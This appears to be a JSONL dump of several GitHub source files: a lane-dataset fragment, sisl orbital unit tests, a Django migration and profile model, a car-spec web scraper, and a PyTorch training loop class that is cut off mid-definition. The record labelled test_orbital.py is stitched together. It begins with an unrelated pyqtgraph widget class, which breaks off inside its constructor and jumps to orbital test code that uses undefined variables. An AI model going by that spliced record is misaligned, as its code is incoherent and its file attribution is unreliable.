ds\r\n","repo_name":"lpplbiubiubiub/RCLane","sub_path":"src/culane_dataset.py","file_name":"culane_dataset.py","file_ext":"py","file_size_in_byte":8121,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"61"} +{"seq_id":"70969082753","text":"import sys\nimport os.path\nfrom .pyqtgraph_vini.Qt import QtCore, QtGui\nimport numpy as np\nimport math\nimport os\nimport copy\n\nfrom .pyqtgraph_vini import *\n\nfrom .ColorMapWidget import *\nfrom .SliceWidget import *\nfrom .SliceBox import *\nfrom .ImageItemMod import *\n\n\nclass SingleSlice(QtGui.QWidget):\n \"\"\"\n Class to display a single slice (popout window).\n \"\"\"\n\n def __init__(self, view):\n super(SingleSlice, self).__init__()\n\n # n - 1 should be zero, regardless of the fill-value\n r0 = orb0.radial(r)\n r1 = orb1.radial(r)\n rr = np.stack((r, np.zeros(len(r)), np.zeros(len(r))), axis=1)\n r2 = orb1.radial((rr**2).sum(-1) ** 0.5)\n assert np.allclose(r0, r1)\n assert np.allclose(r0, r2)\n r[r >= rf[0].max()] = 0.0\n assert np.allclose(r0, r)\n assert np.allclose(r1, r)\n\n def test_psi1(self):\n rf = r_f(6)\n orb0 = SphericalOrbital(0, rf)\n orb1 = SphericalOrbital(1, rf)\n r = np.linspace(0, 6, 333 * 3).reshape(-1, 3)\n p0 = orb0.psi(r)\n p1 = orb1.psi(r)\n assert not np.allclose(p0, p1)\n orb0 = SphericalOrbital(1, rf)\n assert orb0.equal(orb1, radial=True, psi=True)\n\n for m in range(orb0.l, orb0.l + 1):\n p0 = orb0.psi(r, -1)\n p1 = orb1.psi(r, -1)\n assert np.allclose(p0, p1)\n p0 = orb0.psi(r, -1)\n p1 = orb1.psi(r, 1)\n assert not np.allclose(p0, p1)\n\n def test_radial_func1(self):\n r = np.linspace(0, 4, 300)\n f = np.exp(-r)\n o = SphericalOrbital(1, (r, f), R=4.0)\n str(o)\n\n def i_univariate(r, f):\n return interp.UnivariateSpline(r, f, k=5, s=0, ext=1, check_finite=False)\n\n def i_interp1d(r, f):\n return interp.interp1d(\n r, f, kind=\"cubic\", fill_value=(f[0], 0.0), bounds_error=False\n )\n\n def i_spline(r, f):\n from functools import partial\n\n tck = interp.splrep(r, f, k=5, s=0)\n return partial(interp.splev, tck=tck, der=0, ext=1)\n\n # Interpolation radius\n R = np.linspace(0, 5, 400)\n\n assert np.allclose(o.radial(r), f)\n f_default = o.radial(R)\n\n o.set_radial(r, f, interp=i_univariate)\n assert np.allclose(o.radial(r), f)\n f_univariate = o.radial(R)\n o.set_radial(r, f, interp=i_interp1d)\n assert np.allclose(o.radial(r), f)\n f_interp1d = o.radial(R)\n\n o.set_radial(r, f, interp=i_spline)\n assert np.allclose(o.radial(r), f)\n f_spline = o.radial(R)\n\n # Checks that they are equal\n assert np.allclose(f_univariate, f_interp1d)\n assert np.allclose(f_univariate, f_spline)\n assert np.allclose(f_univariate, f_default)\n\n def test_same1(self):\n rf = r_f(6)\n o0 = SphericalOrbital(0, rf)\n o1 = Orbital(o0.R)\n assert o0.equal(o1)\n assert not o0.equal(Orbital(3.0))\n\n def test_toatomicorbital1(self):\n rf = r_f(6)\n # Check m and l\n for l in range(_max_l + 1):\n orb = SphericalOrbital(l, rf)\n ao = orb.toAtomicOrbital()\n assert len(ao) == 2 * l + 1\n m = -l\n for a in ao:\n assert a.l == orb.l\n assert a.m == m\n m += 1\n\n orb = SphericalOrbital(1, rf)\n ao = orb.toAtomicOrbital(1)\n assert ao.l == orb.l\n assert ao.m == 1\n ao = orb.toAtomicOrbital(-1)\n assert ao.l == orb.l\n assert ao.m == -1\n ao = orb.toAtomicOrbital(0)\n assert ao.l == orb.l\n assert ao.m == 0\n ao = orb.toAtomicOrbital([0, -1, 1])\n for a in ao:\n assert a.l == orb.l\n assert ao[0].m == 0\n assert ao[1].m == -1\n assert ao[2].m == 1\n\n def test_toatomicorbital2(self):\n rf = r_f(6)\n orb = SphericalOrbital(1, rf)\n with pytest.raises(ValueError):\n ao = orb.toAtomicOrbital(2)\n\n def test_toatomicorbital_q0(self):\n rf = r_f(6)\n orb = SphericalOrbital(0, rf, 2.0)\n\n # Check m and l\n for l in range(_max_l + 1):\n orb = SphericalOrbital(l, rf, 2.0)\n ao = orb.toAtomicOrbital()\n assert ao[0].q0 == pytest.approx(2.0 / (2 * l + 1))\n\n def test_pickle1(self):\n rf = r_f(6)\n import pickle as p\n\n o0 = SphericalOrbital(1, rf)\n o1 = SphericalOrbital(2, rf)\n p0 = p.dumps(o0)\n p1 = p.dumps(o1)\n l0 = p.loads(p0)\n l1 = p.loads(p1)\n assert o0 == l0\n assert o1 == l1\n assert o0 != l1\n assert o1 != l0\n\n def test_togrid1(self):\n o = SphericalOrbital(1, r_f(6))\n o.toGrid()\n o.toGrid(R=10)\n\n def test_togrid2(self):\n o = SphericalOrbital(1, r_f(6))\n with pytest.raises(ValueError):\n o.toGrid(R=-1)\n\n\nclass Test_atomicorbital:\n def test_init1(self):\n rf = r_f(6)\n a = []\n a.append(AtomicOrbital(2, 1, 0, 1, True, rf))\n a.append(AtomicOrbital(l=1, m=0, zeta=1, P=True, spherical=rf))\n f = interp.interp1d(\n rf[0], rf[1], fill_value=(0.0, 0.0), bounds_error=False, kind=\"cubic\"\n )\n a.append(AtomicOrbital(l=1, m=0, zeta=1, P=True, spherical=f))\n a.append(AtomicOrbital(\"pzP\", f))\n a.append(AtomicOrbital(\"pzP\", rf))\n a.append(AtomicOrbital(\"2pzP\", rf))\n for i in range(len(a) - 1):\n for j in range(i + 1, len(a)):\n assert a[i] == a[j] and a[i].equal(a[j], psi=True, radial=True)\n\n def test_init2(self):\n assert AtomicOrbital(\"pzP\") == AtomicOrbital(n=2, l=1, m=0, P=True)\n\n def test_init3(self):\n rf = r_f(6)\n for l in range(_max_l + 1):\n a = AtomicOrbital(l=l, m=0, spherical=rf)\n a.name()\n a.name(True)\n str(a)\n a = AtomicOrbital(l=l, m=0, P=True, spherical=rf, tag=\"hello\")\n a.name()\n a.name(True)\n str(a)\n\n def test_init4(self):\n rf = r_f(6)\n o1 = AtomicOrbital(2, 1, 0, 1, True, rf)\n o2 = AtomicOrbital(\"pzP\", rf)\n o3 = AtomicOrbital(\"pzZP\", rf)\n o4 = AtomicOrbital(\"pzZ1P\", rf)\n o5 = AtomicOrbital(\"2pzZ1P\", rf)\n assert o1 == o2\n assert o1 == o3\n assert o1 == o4\n assert o1 == o5\n\n def test_init5(self):\n with pytest.raises(ValueError):\n AtomicOrbital(5, _max_l + 1, 0)\n\n def test_copy(self):\n rf = r_f(6)\n orb = AtomicOrbital(\"pzP\", rf, R=2.0)\n assert orb.R == orb.copy().R\n assert orb.R == pytest.approx(2.0)\n orb = AtomicOrbital(\"pzP\", rf)\n assert orb.R == orb.copy().R\n\n def test_radial1(self):\n rf = r_f(6)\n r = np.linspace(0, 6, 100)\n for l in range(_max_l + 1):\n so = SphericalOrbital(l, rf)\n sor = so.radial(r)\n for m in range(-l, l + 1):\n o = AtomicOrbital(l=l, m=m, spherical=rf)\n assert np.allclose(sor, o.radial(r))\n o.set_radial(rf[0], rf[1])\n assert np.allclose(sor, o.radial(r))\n\n def test_phi1(self):\n rf = r_f(6)\n r = np.linspace(0, 6, 999).reshape(-1, 3)\n for l in range(_max_l + 1):\n so = SphericalOrbital(l, rf)\n for m in range(-l, l + 1):\n o = AtomicOrbital(l=l, m=m, spherical=rf)\n assert np.allclose(so.psi(r, m), o.psi(r))\n\n def test_pickle1(self):\n import pickle as p\n\n rf = r_f(6)\n o0 = AtomicOrbital(2, 1, 0, 1, True, rf, tag=\"hello\", q0=1.0)\n o1 = AtomicOrbital(l=1, m=0, zeta=1, P=False, spherical=rf)\n o2 = AtomicOrbital(l=1, m=0, zeta=1, P=False)\n p0 = p.dumps(o0)\n p1 = p.dumps(o1)\n p2 = p.dumps(o2)\n l0 = p.loads(p0)\n l1 = p.loads(p1)\n l2 = p.loads(p2)\n assert o0 == l0\n assert o1 == l1\n assert o2 == l2\n assert o0 != l1\n assert o1 != l0\n assert o2 != l0\n\n\nclass Test_hydrogenicorbital:\n def test_init(self):\n orb = HydrogenicOrbital(2, 1, 0, 3.2)\n\n def test_basic1(self):\n orb = HydrogenicOrbital(2, 1, 0, 3.2, R=4.0)\n assert orb.R == orb.copy().R\n assert orb.R == pytest.approx(4.0)\n orb = HydrogenicOrbital(2, 1, 0, 3.2)\n assert orb.R == orb.copy().R\n\n def test_copy(self):\n orb = HydrogenicOrbital(2, 1, 0, 3.2, tag=\"test\", q0=2.5)\n orb2 = orb.copy()\n assert orb.n == orb2.n\n assert orb.l == orb2.l\n assert orb.m == orb2.m\n assert orb.q0 == orb2.q0\n assert orb.tag == orb2.tag\n\n def test_normalization(self):\n for n in range(6):\n zeff = n * 0.9\n for l in range(n):\n orb = HydrogenicOrbital(n, l, 0, zeff)\n x = np.linspace(0, orb.R, 1000, endpoint=True)\n Rnl = orb.radial(x)\n I = np.trapz(x**2 * Rnl**2, x=x)\n assert abs(I - 1) < 1e-4\n\n def test_togrid(self):\n for n in range(3):\n zeff = n * 0.9\n for l in range(n):\n for m in range(-l, l + 1):\n orb = HydrogenicOrbital(n, l, m, zeff)\n g = orb.toGrid(0.1)\n I = (g.grid**2).sum() * g.dvolume\n assert abs(I - 1) < 1e-3\n\n def test_pickle(self):\n import pickle as p\n\n o0 = HydrogenicOrbital(2, 1, 0, 3.2, tag=\"test\", q0=2.5)\n o1 = HydrogenicOrbital(2, 1, 0, 3.2)\n p0 = p.dumps(o0)\n p1 = p.dumps(o1)\n l0 = p.loads(p0)\n l1 = p.loads(p1)\n assert o0 == l0\n assert o1 == l1\n assert o0 != l1\n assert o1 != l0\n\n\nclass Test_GTO:\n def test_init(self):\n alpha = [1, 2]\n coeff = [0.1, 0.44]\n orb = GTOrbital(2, 1, 0, alpha, coeff)\n assert orb.R > 0\n\n def test_copy(self):\n alpha = [1, 2]\n coeff = [0.1, 0.44]\n orb = GTOrbital(2, 1, 0, alpha, coeff, R=4.0)\n assert orb.R == orb.copy().R\n assert orb.R == pytest.approx(4.0)\n orb = GTOrbital(2, 1, 0, alpha, coeff)\n assert orb.R == orb.copy().R\n\n def test_gto_funcs(self):\n alpha = [0.1688, 0.6239, 3.425]\n coeff = [0.4, 0.7, 1.3]\n x = np.linspace(0, 10, 1000)\n orb = GTOrbital(2, 1, 0, alpha, coeff, R=x[-1])\n assert orb.R == pytest.approx(x[-1])\n Rnl = orb.radial(x)\n\n R = np.random.rand(10, 3)\n orb.psi(R)\n\n theta, phi = np.random.rand(2, 10)\n orb.spher(theta, phi)\n\n orb.psi_spher((R**2).sum(-1) ** 0.5, theta, phi)\n\n\nclass Test_STO:\n def test_init(self):\n alpha = [1, 2]\n coeff = [0.1, 0.44]\n orb = STOrbital(2, 1, 0, alpha, coeff)\n assert orb.R > 0\n\n def test_copy(self):\n alpha = [1, 2]\n coeff = [0.1, 0.44]\n orb = STOrbital(2, 1, 0, alpha, coeff, R=4.0)\n assert orb.R == orb.copy().R\n assert orb.R == pytest.approx(4.0)\n orb = STOrbital(2, 1, 0, alpha, coeff)\n assert orb.R == orb.copy().R\n\n def test_sto_funcs(self):\n alpha = [0.1688, 0.6239, 3.425]\n coeff = [0.4, 0.7, 1.3]\n x = np.linspace(0, 10, 1000)\n orb = STOrbital(2, 1, 0, alpha, coeff, R=x[-1])\n assert orb.R == pytest.approx(x[-1])\n Rnl = orb.radial(x)\n\n R = np.random.rand(10, 3)\n orb.psi(R)\n\n theta, phi = np.random.rand(2, 10)\n orb.spher(theta, phi)\n\n orb.psi_spher((R**2).sum(-1) ** 0.5, theta, phi)\n","repo_name":"zerothi/sisl","sub_path":"src/sisl/tests/test_orbital.py","file_name":"test_orbital.py","file_ext":"py","file_size_in_byte":15120,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"61"} +{"seq_id":"39807420455","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('cashflow', '0003_auto_20170227_1313'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='cashchange',\n name='plan_link',\n field=models.ForeignKey(default=None, verbose_name=b'plan', to='cashflow.PlanLink'),\n preserve_default=False,\n ),\n ]\n","repo_name":"likangwei/cashflow","sub_path":"cashflow/migrations/0004_cashchange_plan_link.py","file_name":"0004_cashchange_plan_link.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12267318878","text":"import bs4\nimport requests\n\n\n \n\n\n\ndef get_data(link):\n\n data_to_send = []\n data_to_get =[]\n req6 = requests.get(link)\n soup6 = bs4.BeautifulSoup(req6.text,\"html.parser\")\n #Car NAme\n data9 = soup6.find(\"div\",attrs={\"class\",\"gsc_col-xs-12 gsc_col-sm-12 gsc_col-md-7 gsc_col-lg-7 overviewdetail\"})\n data_to_send.append(data9.h1.get_text())\n\n #Car Price\n data10 = data9.find(\"div\",attrs={\"class\",\"price\"})\n if data10 == None:\n data_to_send.append(\"varient Experied\")\n else:\n price = data10.get_text().split('*')\n data_to_send.append(price[0])\n\n #---------------car details----------------------------------\n\n data7 = soup6.find_all(\"table\",attrs={\"class\",\"keyfeature\"})\n print(len(data7))\n if len(data7) == 13:\n data_in_td = data7[2:7]\n data_in_single = data7[7:-1]\n elif len(data7) == 12:\n data_in_td = data7[1:6]\n data_in_single = data7[6:-1]\n\n\n for dat in data_in_td:\n data = dat.find_all(\"td\")\n for tdata in data:\n data_to_get.append(tdata.get_text())\n # data = 1\n for dat in data_in_single:\n daa = dat.find_all(\"i\")\n for da in daa:\n data_to_get.append(da.get_text()[0:1000])\n # dara =1 \n data_left = data_to_get[::2]\n data_right = data_to_get[1::2]\n\n\n\n return data_to_send,data_left,data_right\n\n\n# return data_to_send\n\n\n\n","repo_name":"Sudhanva07/Crawler","sub_path":"getData.py","file_name":"getData.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16110155978","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\nclass Profile(models.Model):\n\tACCESS_OPTIONS = (\n\t\t('Admin', 'Admin'),\n\t\t('Client', 'Client'),\n\t\t('Customer', 'Customer'),\n\t\t)\n\tuser = models.OneToOneField(User, on_delete=models.CASCADE)\n\taccess = models.CharField(max_length=10, choices=ACCESS_OPTIONS, null=False)\n\t\n\tdef __str__(self):\n\t\treturn self.user.username\n","repo_name":"kriti21/Smart-India-Hackathon-2018","sub_path":"Portal_FilmShooting/accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"40501639515","text":"\"\"\"\nClass for a generic model trainer.\n\"\"\"\nimport torch\nimport numpy as np\nimport os\nfrom tqdm import tqdm\nfrom blip.dataset.blip import BlipDataset\nfrom blip.utils.logger import Logger\nfrom blip.losses import LossHandler\nfrom blip.models import ModelChecker\nfrom blip.metrics import MetricHandler\nfrom blip.optimizers import Optimizer\nfrom blip.utils.timing import Timers\nfrom blip.utils.memory import MemoryTrackers\nfrom blip.utils.callbacks import CallbackHandler\nfrom blip.utils.callbacks import TimingCallback, MemoryTrackerCallback\nimport blip.utils.utils as utils\n\nclass Trainer:\n \"\"\"\n This class is an attempt to reduce code rewriting by putting together\n a set of functions that do everything that we could need with \n respect to training. There are a few objects which must be passed\n to the trainer, which include:\n (a) model - an object which inherits from nn.Module\n (b) criterion - an object which has a defined function called \"loss\"\n (c) optimizer - some choice of optimizer, e.g. Adam\n (d) metrics - (optional) an object which has certain defined functions\n (e) callbacks - (optional) an object which has certain defined functions \n \"\"\"\n def __init__(self,\n model,\n criterion: LossHandler=None,\n optimizer: Optimizer=None,\n metrics: MetricHandler=None,\n callbacks: CallbackHandler=None,\n meta: dict={},\n seed: int=0,\n ): \n self.name = model.name + \"_trainer\"\n self.logger = Logger(self.name, output='both', file_mode='w')\n self.logger.info(f\"constructing model trainer.\")\n self.meta = meta\n if \"device\" in self.meta:\n self.device = self.meta['device']\n else:\n self.device = 'cpu'\n if meta['verbose']:\n self.logger = Logger(self.name, output=\"both\", file_mode=\"w\")\n else:\n self.logger = Logger(self.name, level='warning', file_mode=\"w\")\n # Check for compatability with parameters\n\n # define directories\n self.predictions_dir = f'{self.meta[\"local_scratch\"]}/predictions/{model.name}/'\n self.manifold_dir = f'{self.meta[\"local_scratch\"]}/plots/{model.name}/manifold/'\n self.features_dir = f'{self.meta[\"local_scratch\"]}/plots/{model.name}/features/'\n self.timing_dir = f'{self.meta[\"local_scratch\"]}/plots/{model.name}/timing/'\n self.memory_dir = f'{self.meta[\"local_scratch\"]}/plots/{model.name}/memory/'\n\n # create directories\n if not os.path.isdir(self.predictions_dir):\n self.logger.info(f\"creating predictions directory '{self.predictions_dir}'\")\n os.makedirs(self.predictions_dir)\n if not os.path.isdir(self.manifold_dir):\n self.logger.info(f\"creating manifold directory '{self.manifold_dir}'\")\n os.makedirs(self.manifold_dir)\n if not os.path.isdir(self.features_dir):\n self.logger.info(f\"creating features directory '{self.features_dir}'\")\n os.makedirs(self.features_dir)\n if not os.path.isdir(self.timing_dir):\n self.logger.info(f\"creating timing directory '{self.timing_dir}'\")\n os.makedirs(self.timing_dir)\n if not os.path.isdir(self.memory_dir):\n self.logger.info(f\"creating memory directory '{self.memory_dir}'\")\n os.makedirs(self.memory_dir)\n\n # check for devices\n self.gpu = self.meta['gpu']\n self.seed = seed\n \n # assign objects\n self.model = model\n self.optimizer = optimizer\n self.criterion = criterion\n self.metrics = metrics\n if callbacks == None:\n # add generic callbacks\n self.callbacks = CallbackHandler(\n name=\"default\"\n )\n else:\n self.callbacks = callbacks\n self.model_checker = ModelChecker(\"model_checker\")\n\n # send other objects to the device\n self.model.set_device(self.device)\n self.criterion.set_device(self.device)\n if self.metrics != None:\n self.metrics.set_device(self.device)\n\n # add timing info\n self.timers = Timers(gpu=self.gpu)\n self.timer_callback = TimingCallback(\n output_dir=self.timing_dir,\n timers=self.timers\n )\n self.callbacks.add_callback(self.timer_callback)\n\n # add memory info\n self.memory_trackers = MemoryTrackers(gpu=self.gpu)\n self.memory_callback = MemoryTrackerCallback(\n output_dir=self.memory_dir,\n memory_trackers=self.memory_trackers\n )\n self.callbacks.add_callback(self.memory_callback)\n\n # run consistency check\n self.logger.info(f\"running consistency check...\")\n self.shapes = self.model_checker.run_consistency_check(\n dataset_loader=self.meta['loader'],\n model=self.model,\n criterion=self.criterion,\n metrics=self.metrics\n )\n\n def train(self,\n epochs: int=100, # number of epochs to train\n checkpoint: int=10, # epochs inbetween weight saving\n progress_bar: str='all', # progress bar from tqdm\n rewrite_bar: bool=False, # wether to leave the bars after each epoch\n save_predictions:bool=True, # wether to save network outputs for all events to original file\n no_timing: bool=False, # wether to keep the bare minimum timing info as a callback\n ):\n \"\"\"\n Main training loop. First, we see if the user wants to omit timing information.\n \"\"\"\n if (self.model.device != self.device):\n self.logger.error(f\"device: '{self.device}' and model device: '{self.model.device}' are different!\")\n if (self.criterion.device != self.device):\n self.logger.error(f\"device: '{self.device}' and model device: '{self.criterion.device}' are different!\")\n \n self.model.save_model(flag='init')\n # setting values in callbacks\n self.callbacks.set_device(self.device)\n self.callbacks.set_training_info(\n epochs,\n self.meta['loader'].num_train_batches,\n self.meta['loader'].num_validation_batches,\n self.meta['loader'].num_test_batches\n )\n # Training\n self.logger.info(f\"training dataset '{self.meta['dataset'].name}' for {epochs} epochs.\")\n if no_timing:\n # TODO: Need to fix this so that memory and timing callbacks aren't called.\n self.__train_no_timing(\n epochs,\n checkpoint,\n progress_bar,\n rewrite_bar,\n save_predictions\n )\n else:\n self.__train_with_timing(\n epochs,\n checkpoint,\n progress_bar,\n rewrite_bar,\n save_predictions\n )\n\n def __train_with_timing(self,\n epochs: int=100, # number of epochs to train\n checkpoint: int=10, # epochs inbetween weight saving\n progress_bar: str='all', # progress bar from tqdm\n rewrite_bar: bool=False, # wether to leave the bars after each epoch\n save_predictions:bool=True, # wether to save network outputs for all events to original file\n ):\n \"\"\"\n Training usually consists of the following steps:\n (1) Zero-out training/validation/testing losses and metrics\n (2) Loop for N epochs:\n (a) Grab the current batch of (training/validation) data.\n (b) Run the data through the model and calculate losses/metrics.\n (c) Backpropagate the loss (training)\n (3) Evaluate the trained model on testing data.\n \"\"\"\n # iterate over epochs\n for epoch in range(epochs):\n \"\"\"\n Training stage.\n Setup the progress bar for the training loop.\n \"\"\"\n if (progress_bar == 'all' or progress_bar == 'train'):\n training_loop = tqdm(\n enumerate(self.meta['loader'].train_loader, 0), \n total=len(self.meta['loader'].train_loader), \n leave=rewrite_bar,\n position=0,\n colour='green'\n )\n else:\n training_loop = enumerate(self.meta['loader'].train_loader, 0)\n\n # make sure to set model to train() during training!\n self.model.train()\n \"\"\" \n Setup timing/memory information for epoch.\n \"\"\"\n self.timers.timers['epoch_training'].start()\n self.memory_trackers.memory_trackers['epoch_training'].start()\n self.timers.timers['training_data'].start()\n self.memory_trackers.memory_trackers['training_data'].start()\n for ii, data in training_loop:\n self.memory_trackers.memory_trackers['training_data'].end()\n self.timers.timers['training_data'].end()\n # zero the parameter gradients\n \"\"\"\n There are choices here, either one can do:\n model.zero_grad() or\n optimizer.zero_grad() or\n for param in model.parameters(): <== optimal choice\n param.grad = None\n \"\"\"\n self.timers.timers['training_zero_grad'].start()\n self.memory_trackers.memory_trackers['training_zero_grad'].start()\n for param in self.model.parameters():\n param.grad = None\n self.memory_trackers.memory_trackers['training_zero_grad'].end()\n self.timers.timers['training_zero_grad'].end()\n # get the network output\n \"\"\"\n The forward call takes in the entire data\n stream, which could have multiple inputs needed.\n It's up to the model to determine what to do with it.\n The forward call of the model could send out\n multiple output tensors, depending on the application\n (such as in an AE where the latent space values are\n important). It's up to the loss function to know what to expect.\n \"\"\"\n self.timers.timers['training_forward'].start()\n self.memory_trackers.memory_trackers['training_forward'].start()\n outputs = self.model(data)\n self.memory_trackers.memory_trackers['training_forward'].end()\n self.timers.timers['training_forward'].end()\n\n # compute loss\n self.timers.timers['training_loss'].start()\n self.memory_trackers.memory_trackers['training_loss'].start()\n loss = self.criterion.loss(outputs, data)\n self.memory_trackers.memory_trackers['training_loss'].end()\n self.timers.timers['training_loss'].end()\n\n # backprop\n self.timers.timers['training_loss_backward'].start()\n self.memory_trackers.memory_trackers['training_loss_backward'].start()\n loss.backward()\n self.memory_trackers.memory_trackers['training_loss_backward'].end()\n self.timers.timers['training_loss_backward'].end()\n\n # record backprop timing\n self.timers.timers['training_backprop'].start()\n self.memory_trackers.memory_trackers['training_backprop'].start()\n self.optimizer.step()\n self.memory_trackers.memory_trackers['training_backprop'].end()\n self.timers.timers['training_backprop'].end()\n\n # update progress bar\n self.timers.timers['training_progress'].start()\n self.memory_trackers.memory_trackers['training_progress'].start()\n if (progress_bar == 'all' or progress_bar == 'train'):\n training_loop.set_description(f\"Training: Epoch [{epoch+1}/{epochs}]\")\n training_loop.set_postfix_str(f\"loss={loss.item():.2e}\")\n self.memory_trackers.memory_trackers['training_progress'].end()\n self.timers.timers['training_progress'].end()\n \n self.timers.timers['training_data'].start()\n self.memory_trackers.memory_trackers['training_data'].start()\n # update timing info\n self.memory_trackers.memory_trackers['epoch_training'].end()\n self.timers.timers['epoch_training'].end()\n self.model.eval()\n with torch.no_grad():\n \"\"\"\n Run through a metric loop if there are any metrics\n defined.\n \"\"\"\n if self.metrics != None:\n if (progress_bar == 'all' or progress_bar == 'train'):\n metrics_training_loop = tqdm(\n enumerate(self.meta['loader'].train_loader, 0), \n total=len(self.meta['loader'].train_loader), \n leave=rewrite_bar,\n position=0,\n colour='green'\n )\n else:\n metrics_training_loop = enumerate(self.meta['loader'].train_loader, 0)\n self.metrics.reset_batch()\n for ii, data in metrics_training_loop:\n # update metrics\n self.timers.timers['training_metrics'].start()\n self.memory_trackers.memory_trackers['training_metrics'].start()\n outputs = self.model(data)\n self.metrics.update(outputs, data, train_type=\"train\")\n self.memory_trackers.memory_trackers['training_metrics'].end()\n self.timers.timers['training_metrics'].end()\n if (progress_bar == 'all' or progress_bar == 'train'):\n metrics_training_loop.set_description(f\"Training Metrics: Epoch [{epoch+1}/{epochs}]\")\n \n # evaluate callbacks\n self.timers.timers['training_callbacks'].start()\n self.memory_trackers.memory_trackers['training_callbacks'].start()\n self.callbacks.evaluate_epoch(train_type='train')\n self.memory_trackers.memory_trackers['training_callbacks'].end()\n self.timers.timers['training_callbacks'].end()\n\n \"\"\"\n Validation stage.\n Setup the progress bar for the validation loop.\n \"\"\"\n if (progress_bar == 'all' or progress_bar == 'validation'):\n validation_loop = tqdm(\n enumerate(self.meta['loader'].validation_loader, 0), \n total=len(self.meta['loader'].validation_loader), \n leave=rewrite_bar,\n position=0,\n colour='blue'\n )\n else:\n validation_loop = enumerate(self.meta['loader'].validation_loader, 0)\n # make sure to set model to eval() during validation!\n self.model.eval()\n with torch.no_grad():\n \"\"\"\n Setup timing information for epoch.\n \"\"\"\n self.timers.timers['epoch_validation'].start()\n self.memory_trackers.memory_trackers['epoch_validation'].start()\n self.timers.timers['validation_data'].start()\n self.memory_trackers.memory_trackers['validation_data'].start()\n for ii, data in validation_loop:\n self.memory_trackers.memory_trackers['validation_data'].end()\n self.timers.timers['validation_data'].end()\n # get the network output\n self.timers.timers['validation_forward'].start()\n self.memory_trackers.memory_trackers['validation_forward'].start()\n outputs = self.model(data)\n self.memory_trackers.memory_trackers['validation_forward'].end()\n self.timers.timers['validation_forward'].end()\n\n # compute loss\n self.timers.timers['validation_loss'].start()\n self.memory_trackers.memory_trackers['validation_loss'].start()\n loss = self.criterion.loss(outputs, data)\n self.memory_trackers.memory_trackers['validation_loss'].end()\n self.timers.timers['validation_loss'].end()\n\n # update progress bar\n self.timers.timers['validation_progress'].start()\n self.memory_trackers.memory_trackers['validation_progress'].start()\n if (progress_bar == 'all' or progress_bar == 'validation'):\n validation_loop.set_description(f\"Validation: Epoch [{epoch+1}/{epochs}]\")\n validation_loop.set_postfix_str(f\"loss={loss.item():.2e}\")\n self.memory_trackers.memory_trackers['validation_progress'].end()\n self.timers.timers['validation_progress'].end()\n\n self.timers.timers['validation_data'].start()\n self.memory_trackers.memory_trackers['validation_data'].start()\n # update timing info\n self.memory_trackers.memory_trackers['epoch_validation'].end()\n self.timers.timers['epoch_validation'].end()\n \"\"\"\n Run through a metric loop if there are any metrics\n defined.\n \"\"\"\n if self.metrics != None:\n if (progress_bar == 'all' or progress_bar == 'validation'):\n metrics_validation_loop = tqdm(\n enumerate(self.meta['loader'].validation_loader, 0), \n total=len(self.meta['loader'].validation_loader), \n leave=rewrite_bar,\n position=0,\n colour='blue'\n )\n else:\n metrics_validation_loop = enumerate(self.meta['loader'].validation_loader, 0)\n self.metrics.reset_batch()\n for ii, data in metrics_validation_loop:\n # update metrics\n self.timers.timers['validation_metrics'].start()\n self.memory_trackers.memory_trackers['validation_metrics'].start()\n outputs = self.model(data)\n self.metrics.update(outputs, data, train_type=\"validation\")\n self.memory_trackers.memory_trackers['validation_metrics'].end()\n self.timers.timers['validation_metrics'].end()\n if (progress_bar == 'all' or progress_bar == 'validation'):\n metrics_validation_loop.set_description(f\"Validation Metrics: Epoch [{epoch+1}/{epochs}]\")\n\n # evaluate callbacks\n self.timers.timers['validation_callbacks'].start()\n self.memory_trackers.memory_trackers['validation_callbacks'].start()\n self.callbacks.evaluate_epoch(train_type='validation')\n self.memory_trackers.memory_trackers['validation_callbacks'].end()\n self.timers.timers['validation_callbacks'].end()\n\n # save weights if at checkpoint step\n if epoch % checkpoint == 0:\n if not os.path.exists(f\"{self.meta['local_scratch']}/.checkpoints/\"):\n os.makedirs(f\"{self.meta['local_scratch']}/.checkpoints/\")\n torch.save(\n self.model.state_dict(), \n f\"{self.meta['local_scratch']}/.checkpoints/checkpoint_{epoch}.ckpt\"\n )\n # free up gpu resources\n torch.cuda.empty_cache()\n # evaluate epoch callbacks\n self.callbacks.evaluate_training()\n self.logger.info(f\"training finished.\")\n \"\"\"\n Testing stage.\n Setup the progress bar for the testing loop.\n We do not have timing information for the test\n loop stage, since it is generally quick\n and doesn't need to be optimized for any reason.\n \"\"\"\n if (progress_bar == 'all' or progress_bar == 'test'):\n test_loop = tqdm(\n enumerate(self.meta['loader'].test_loader, 0), \n total=len(self.meta['loader'].test_loader), \n leave=rewrite_bar,\n position=0,\n colour='red'\n )\n else:\n test_loop = enumerate(self.meta['loader'].test_loader, 0)\n # make sure to set model to eval() during validation!\n self.model.eval()\n if self.metrics != None:\n self.metrics.reset_batch()\n with torch.no_grad():\n for ii, data in test_loop:\n # get the network output\n outputs = self.model(data)\n\n # compute loss\n loss = self.criterion.loss(outputs, data)\n\n # update metrics\n if self.metrics != None:\n self.metrics.update(outputs, data, train_type=\"test\")\n\n # update progress bar\n if (progress_bar == 'all' or progress_bar == 'test'):\n test_loop.set_description(f\"Testing: Batch [{ii+1}/{self.meta['loader'].num_test_batches}]\")\n test_loop.set_postfix_str(f\"loss={loss.item():.2e}\")\n\n # evaluate callbacks\n self.callbacks.evaluate_epoch(train_type='test')\n self.callbacks.evaluate_testing()\n # save the final model\n self.model.save_model(flag='trained')\n\n # see if predictions should be saved\n if save_predictions:\n self.logger.info(f\"Running inference to save predictions.\")\n return self.inference(\n dataset_type='all',\n outputs=[output for output in self.shapes[\"output\"].keys()],\n progress_bar=progress_bar,\n rewrite_bar=rewrite_bar,\n save_predictions=True,\n )\n \n def __train_no_timing(self,\n epochs: 